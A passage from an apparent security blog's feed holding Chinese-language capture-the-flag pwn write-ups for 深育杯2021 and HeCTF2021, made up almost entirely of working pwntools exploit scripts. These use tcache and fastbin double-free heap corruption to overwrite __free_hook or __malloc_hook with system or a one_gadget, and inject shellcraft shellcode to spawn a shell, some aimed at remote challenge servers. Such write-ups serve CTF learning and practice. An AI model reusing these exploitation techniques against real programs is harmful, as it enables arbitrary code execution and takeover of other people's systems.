class="number">0x60</span> + p64(<span class="number">0x190</span>)</span><br><span class="line">edit(<span class="number">15</span>,payload)</span><br><span class="line">free(<span class="number">16</span>)</span><br><span class="line">add(<span class="number">0x130</span>)</span><br><span class="line"></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">libc_base = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x3ebf20</span></span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line">log.success(<span class="string">&#x27;system_addr: &#x27;</span> + <span class="built_in">hex</span>(system_addr))</span><br><span class="line">log.success(<span class="string">&#x27;free_hook: &#x27;</span> + <span class="built_in">hex</span>(free_hook))</span><br><span class="line"></span><br><span class="line">free(<span class="number">15</span>)</span><br><span class="line">payload = <span class="string">&#x27;/bin/sh\x00&#x27;</span>.ljust(<span class="number">0x120</span>,<span class="string">&#x27;a&#x27;</span>) + p64(free_hook)</span><br><span class="line">edit(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x60</span>)</span><br><span class="line">add(<span class="number">0x60</span>)</span><br><span class="line">edit(<span class="number">2</span>,p64(system_addr))</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="Create-Code"><a href="#Create-Code" class="headerlink" title="Create_Code"></a>Create_Code</h2><h3 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h3><p><img src="/article/SYB2021/image-20211120200518265.png" alt="image-20211120200518265"></p><h3 id="exp-2"><a href="#exp-2" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;create_code&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">content</span>):</span></span><br><span class="line">    cmd(<span class="number">1</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;content: &#x27;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;id: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;id: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">add(<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line"></span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">payload = <span class="string">&#x27;\x02&#x27;</span>*<span class="number">0x100</span> + shellcode</span><br><span class="line">add(payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p,&#x27;b *$rebase(0x146C)&#x27;)</span></span><br><span class="line">payload = p32(<span class="number">0xF012F012</span>) + <span class="string">&#x27;\x02&#x27;</span>*<span class="number">12</span> </span><br><span class="line">payload += (<span class="string">&#x27;\x02&#x27;</span>) * <span class="number">0x330</span></span><br><span class="line">add(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">深育杯2021</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
  </entry>
  
  <entry>
    <title>hectf_2021</title>
    <link href="https://trick.ink/article/hectf_2021/"/>
    <id>https://trick.ink/article/hectf_2021/</id>
    <published>2021-11-13T10:35:17.000Z</published>
    <updated>2023-02-09T17:58:57.354Z</updated>
    
    <content type="html"><![CDATA[<h1 id="HeCTF2021"><a href="#HeCTF2021" class="headerlink" title="HeCTF2021"></a>HeCTF2021</h1><!-- 文章页 配置 --><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">2</span></span><br><span class="line">filename = <span class="string">&#x27;flexible&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;123.56.242.200 &#x27;</span>,<span class="number">10004</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line"><span class="comment"># libc = elf.libc</span></span><br><span class="line">libc = ELF(<span class="string">&quot;./libc-2.23.so&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;choice &gt;&gt;&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,size,name,content</span>):</span></span><br><span class="line">    cmd(<span class="number">1</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Choice your index &gt;&gt;&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;size &gt;&gt;&#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;what is your name &gt;&gt;&#x27;</span>,<span class="built_in">str</span>(name))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Input your context &gt;&gt;&#x27;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    cmd(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Choice your index &gt;&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Input your context &gt;&gt;&#x27;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Choice your index &gt;&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">4</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Choice your index &gt;&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x70</span>,<span class="string">&#x27;a&#x27;</span>,<span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x70</span>,<span class="string">&#x27;a&#x27;</span>,<span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x50</span>,<span class="string">&#x27;a&#x27;</span>,<span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x50</span>,<span class="string">&#x27;a&#x27;</span>,<span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x50</span>,<span class="string">&#x27;a&#x27;</span>,<span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x50</span>,<span class="string">&#x27;a&#x27;</span>,<span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x50</span>,<span class="string">&#x27;a&#x27;</span>,<span class="string">&#x27;b&#x27;</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">main_arena_addr = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) -<span class="number">88</span></span><br><span class="line">malloc_hook = main_arena_addr - <span class="number">0x10</span></span><br><span class="line"></span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">realloc = libc_base + libc.sym[<span class="string">&#x27;realloc&#x27;</span>]</span><br><span class="line"></span><br><span class="line">fake_fast_addr = free_hook - <span class="number">0x13</span></span><br><span class="line">fake_fast_addr = malloc_hook - <span class="number">0x23</span></span><br><span class="line"></span><br><span class="line">one_16 = [<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + one_16[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x50</span>,p64(fake_fast_addr),<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x50</span>,p64(fake_fast_addr),<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x50</span>,p64(fake_fast_addr),<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x50</span>,<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;\x00&#x27;</span>*<span class="number">0xb</span> + p64(one_gadget) + p64(realloc + <span class="number">14</span> )</span><br><span class="line">edit(<span class="number">6</span>,payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc_base)) </span><br><span class="line">log.success(<span class="string">&#x27;main_arena_addr: &#x27;</span> + <span class="built_in">hex</span>(main_arena_addr)) </span><br><span class="line">log.success(<span class="string">&#x27;malloc_hook: &#x27;</span> + <span class="built_in">hex</span>(malloc_hook)) </span><br><span class="line">log.success(<span class="string">&#x27;system_addr: &#x27;</span> + <span class="built_in">hex</span>(system_addr)) </span><br><span class="line">log.success(<span class="string">&#x27;free_hook: &#x27;</span> + <span class="built_in">hex</span>(free_hook)) </span><br><span class="line">log.success(<span class="string">&#x27;fake_fast_addr: &#x27;</span> + <span class="built_in">hex</span>(fake_fast_addr)) </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># add(6,0x20,&#x27;a&#x27;,&#x27;b&#x27;)</span></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">hectf_2021</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
  </entry>
  
</feed>